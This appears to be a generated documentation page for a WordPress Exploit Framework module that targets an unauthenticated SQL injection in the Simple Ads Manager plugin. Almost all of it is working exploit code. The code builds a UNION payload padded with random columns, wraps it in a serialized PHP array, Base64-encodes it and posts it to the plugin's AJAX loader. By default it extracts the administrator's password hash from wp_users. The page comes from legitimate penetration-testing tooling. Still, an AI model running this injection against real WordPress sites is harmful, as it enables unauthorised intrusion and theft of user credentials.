class Wpxf::Auxiliary::SimpleAdsManagerSqlInjection

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::Module::new
# File lib/wpxf/modules/auxiliary/misc/simple_ads_manager_sql_injection.rb, line 9
def initialize
  super

  update_info(
    name: 'Simple Ads Manager SQL Injection',
    desc: 'This module exploits an SQL injection in version '\
          '2.9.5.116 of the Simple Ads Manager plugin which '\
          'allows unauthenticated users to view a single field of '\
          'data at a time, such as e-mails and passwords.',
    author: [
      'Kacper Szurek', # Vulnerability discovery
      'rastating'      # WPXF module
    ],
    references: [
      ['URL', 'http://security.szurek.pl/simple-ads-manager-294116-sql-injection.html'],
      ['WPVDB', '8357']
    ],
    date: 'Dec 30 2015'
  )

  register_options([
    StringOption.new(
      name: 'sql',
      desc: 'The SQL query to execute (maximum of one field selected)',
      default: 'select user_pass from wp_users where ID = 1',
      required: true
    )
  ])
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/auxiliary/misc/simple_ads_manager_sql_injection.rb, line 64
def check
  check_plugin_version_from_readme('simple-ads-manager', '2.9.5.118', '2.9.4.116')
end
compile_sqli() click to toggle source
# File lib/wpxf/modules/auxiliary/misc/simple_ads_manager_sql_injection.rb, line 58
def compile_sqli
  padding = ''
  (1..22).each { |i| padding += ",#{Utility::Text.rand_numeric(rand(1..3))}" }
  sql.gsub(/^(select\s+)(.+)(\s+from.+)/i, ") UNION (\\1\\2#{padding}\\3")
end
encoded_injection() click to toggle source
# File lib/wpxf/modules/auxiliary/misc/simple_ads_manager_sql_injection.rb, line 72
def encoded_injection
  compiled_sqli = compile_sqli
  emit_info "Compiled SQL: #{compiled_sqli}", true
  serialized = "a:4:{s:2:\"WC\";s:3:\"1=0\";s:3:\"WCT\";s:0:\"\";s"\
               ":3:\"WCW\";s:#{compiled_sqli.bytesize}:\"#{compiled_sqli}\""\
               ";s:4:\"WC2W\";s:0:\"\";}"
  Base64.strict_encode64(serialized)
end
run() click to toggle source
Calls superclass method Wpxf::Module#run
# File lib/wpxf/modules/auxiliary/misc/simple_ads_manager_sql_injection.rb, line 81
def run
  return false unless super

  emit_info 'Validating SQL...'
  unless valid_query?
    emit_error 'Specified query appears to be invalid'
    return false
  end

  emit_info 'Preparing injection...'
  body = {
    'action' => 'load_place',
    'id' => '0',
    'pid' => '1',
    'wc' => encoded_injection
  }

  emit_info 'Executing request...'
  res = execute_post_request(url: vulnerable_url, body: body)

  if res.nil? || res.timed_out?
    emit_error 'No response from the target'
    return false
  end

  if res.code != 200 || res.body.strip.empty?
    emit_info "Response code: #{res.code}", true
    emit_info "Response body: #{res.body}", true
    emit_error 'Failed to execute request'
    return false
  end

  emit_info 'Parsing response...'
  begin
    json = JSON.parse(res.body)
    emit_success "Query result: #{json['pid']}"
  rescue JSON::ParserError
    emit_error 'Could not parse the response'
    return false
  end

  true
end
sql() click to toggle source
# File lib/wpxf/modules/auxiliary/misc/simple_ads_manager_sql_injection.rb, line 39
def sql
  normalized_option_value('sql')
end
valid_query?() click to toggle source
# File lib/wpxf/modules/auxiliary/misc/simple_ads_manager_sql_injection.rb, line 43
def valid_query?
  match = sql.match(/^select\s+(.+)\s+from.+/i)
  if match.nil?
    emit_error 'Could not determine the field list from the query', true
    return false
  end

  if match[1].include?(',') || match[1].include?('*')
    emit_warning 'More than one field appears to have been selected. This '\
                 'can cause the query to silently fail and return no data'
  end

  true
end
vulnerable_url() click to toggle source
# File lib/wpxf/modules/auxiliary/misc/simple_ads_manager_sql_injection.rb, line 68
def vulnerable_url
  normalize_uri(wordpress_url_plugins, 'simple-ads-manager', 'sam-ajax-loader.php')
end